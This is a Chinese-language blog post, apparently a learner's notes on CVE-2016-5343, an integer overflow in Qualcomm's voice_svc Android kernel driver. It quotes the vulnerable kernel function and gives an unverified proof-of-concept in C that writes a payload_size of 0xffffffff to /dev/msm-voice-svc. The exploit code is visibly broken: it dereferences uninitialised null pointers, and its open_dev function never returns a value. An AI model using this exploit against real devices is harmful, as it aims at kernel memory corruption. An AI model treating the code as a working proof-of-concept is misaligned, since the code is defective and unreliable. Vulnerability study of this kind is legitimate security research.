最近在学习android内核漏洞,写篇博做个记录,也算是所学即用。 https://www.codeaurora.org/multiple-memory-corruption-issues-write-operation-qdsp6v2-voice-service-driver-cve-2016-5343,有高通的洞也是潜力无限,漏洞定位到/msm/drivers/soc/qcom/qdsp6v2/voice_svc.c的voice_svc_send_req,可以得知write操作能触发,没有搜到这个洞的poc,看补丁,是个整数溢出,用户控制的payload_size,传入kmalloc函数,payload_size+sizeof(struct apr_data)作为分配大小,于是很明显可产生整数溢出了,实际分配了比期望小很多的内存,后续引用该内存发生不可预期结果。
static int voice_svc_send_req(struct voice_svc_cmd_request *apr_request, struct voice_svc_prvt *prtd) { int ret = 0; void *apr_handle = NULL; struct apr_data *aprdata = NULL; uint32_t user_payload_size = 0; pr_debug("%s ", __func__); if (apr_request == NULL) { pr_err("%s: apr_request is NULL ", __func__); ret = -EINVAL; goto done; } user_payload_size = apr_request->payload_size;// aprdata = kmalloc(sizeof(struct apr_data) + user_payload_size, GFP_KERNEL);//会分配小于设定值的内存 if (aprdata == NULL) { pr_err("%s: aprdata kmalloc failed. ", __func__); ret = -ENOMEM; goto done; }
写了个poc,尚未经验证,先记录下,后续实验过后再完善:
1 #include <stdlib.h> 2 #include <stdio.h> 3 #include <unistd.h> 4 #include <sys/ioctl.h> 5 #include <sys/types.h> 6 #include <sys/stat.h> 7 #include <fcntl.h> 8 #include "voice_svc.h" 9 10 static int open_dev(const char *dev){ 11 int fd=open(dev,O_RDWR); 12 if(fd<0){ 13 printf("failed to open %s ",dev); 14 exit(EXIT_FAILURE); 15 } 16 } 17 18 int main(void){ 19 struct voice_svc_write_msg *data=NULL; 20 data->msg_type=MSG_REQUEST; 21 struct voice_svc_cmd_request *apt_request; 22 apt_request->payload_size=0xffffffff; 23 24 data->payload[0] = apt_request; 25 int fd=-1; 26 fd=open_dev("/dev/msm-voice-svc");//设备名有待确定 27 int ret; 28 ret=write(fd,data,(sizeof(*data)+sizeof(struct voice_svc_register))); 29 close(fd); 30 return 0; 31 }